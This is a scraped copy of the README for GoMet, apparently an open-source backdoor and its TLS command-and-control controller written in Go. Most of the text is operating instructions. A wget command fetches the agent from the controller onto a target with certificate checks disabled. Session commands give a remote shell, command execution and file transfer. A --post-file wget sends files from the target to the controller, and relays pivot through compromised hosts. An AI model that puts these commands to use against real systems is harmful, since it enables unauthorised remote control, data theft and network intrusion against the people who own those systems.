93

GitHub - mimah/GoMet: Multi-platform backdoor in Go. TCP forwarding, socks5, tun...

 5 years ago
source link: https://github.com/mimah/GoMet
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

README.md

GoMet

Simple multi-platform agent and its controller. The agent communicates with its controller through TLS tunnel.

Work in progress :)

Build

Install Go (https://golang.org/dl/).

Download dependencies.

cd gomet
go get github.com/abiosoft/[email protected]+incompatible
go get github.com/ginuerzh/[email protected]
go get github.com/gorilla/[email protected]
go get github.com/xtaci/[email protected]
cd ..

And compile GoMet.

go build .

Basic usage

Launch GoMet

#> ./GoMet


	  ____       __  __      _
	 / ___| ___ |  \/  | ___| |_
	| |  _ / _ \| |\/| |/ _ \ __|
	| |_| | (_) | |  | |  __/ |_
	 \____|\___/|_|  |_|\___|\__|
                                      by Mimah

server > info
Local listener: 0.0.0.0:8888
Socks listener: 127.0.0.1:9050
HTTP magic: khRoKbh3AZSHbix
server >
server > help

Commands:
  clear         clear the screen
  exit          Exit
  generate      Generate an agent
  help          display help
  info          Print server information
  routes        List routes
  sessions      List sessions

On the target system download an agent for the corresponding OS and Architecture

wget https://<controller>:8888/khRoKbh3AZSHbix/agent/darwin/amd64 --no-check-certificate -O agent

The controller automatically builds an agent with the right information.

Note: "khRoKbh3AZSHbix" is a random magic generated by the controller, type "info" in the GoMet CLI to know it. In this use-case you have to add --no-check-certificate option because the default TLS certificate is auto-signed.

Available OS (see Golang GOOS):

linux
darwin
windows
solaris
...

Available Architectures (see Golang GOARCH):

386
amd64
arm
arm64
...

Launch the agent

chmod +x agent
./agent

In GoMet CLI we can see the new session created

server > New session 1 - <agent_hostname> - <agent_IP>:<agent_port> - darwin/amd64

Interact with a session

server > sessions open 1
session 1 > help

Commands:
  cat           Print a file
  clear         clear the screen
  close         Close session
  connect       Connect a local port to a remote Address
  download      Download a file
  execute       Execute a command
  exit          Back to server
  getuid        Get user Id
  help          display help
  jobs          List jobs
  listen        Connect a remote port to a local Address
  ls            List files
  netstat       List connections
  ps            List processes
  pwd           Get current directory
  relay         Relay listen
  shell         Interactive remote shell
  streams       List streams
  upload        Upload a file


session 1 >

TCP forwarding

We can forward TCP connection through the agent TLS tunnel in both direction.

connect

Listen a port locally (on the controller system) and forward it to a remote service.

listen

Listen a port remotely (on the agent system) and forward it to a local service.

Socks5 and routing

We can enable a Socks5 listener on the controller to access remote networks through the agents and define routes toward the different sessions.

Make a relay

If the controller is not accessible from the target system (after network pivot) we can define a "relay" on another agent. Then we can access the controller through the relay like the controller itself.

session 1 > relay
Remote Address: 0.0.0.0:9999
session 1 >

And from the target system

wget https://<relay>:9999/khRoKbh3AZSHbix/agent/darwin/amd64 --no-check-certificate -O agent

Share files with the controller

The controller can share files.

Copy a file in the share directory and download it with the magic URL

wget https://<controller>:8888/khRoKbh3AZSHbix/my_file --no-check-certificate

We can also upload a file to the controller

wget https://<controller>:8888/khRoKbh3AZSHbix/other_file --no-check-certificate --post-file file

Generate an agent with the CLI

server > generate
OS: windows
Arch: amd64
Host: <controller>:8888
HTTP proxy:
HTTPS proxy:
Proxy username:
Proxy password:
Generated agent URL: https://<controller>:8888/Ye8o14kw1rpMJ8f/ySUxt7YT8X5fyat
server >

Configuration files

Default configuration is defined in config/config.json file.

{
  "listenAddr":"0.0.0.0:8888",

  "socks": {
    "enable": true,
    "addr": "127.0.0.1:9050"
  },

  "api": {
    "enable": false,
    "addr": "127.0.0.1:9000"
  }
}

Define a tunnel

If we want to listen through a tunnel we can define it in the configuration file. SSH only actually.

{
  "listenAddr":"0.0.0.0:8888",

  "socks": {
    "enable": true,
    "addr": "127.0.0.1:9050"
  },

  "tunnel": {
    "listenAddr":"<exit_node>:8888",
    "nodes": [
      {
        "type":"ssh",
        "host": "<first_node>:22",
        "username": "user",
        "password": "user"
      },
      {
        "type":"ssh",
        "host": "<second_node>:22",
        "username": "user",
        "password": "user"
      },
      {
        "type":"ssh",
        "host": "<exit_node>:22",
        "username": "user",
        "password": "user"
      }
    ]
  }
}

Custom TLS certificate

A default certificate is generated in the config directory. You can replace it with yours.

Warning: If you change the certificate you have rebuild all the agents because the certificate hash will not be the same.

HTTP API

Work in progress


report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK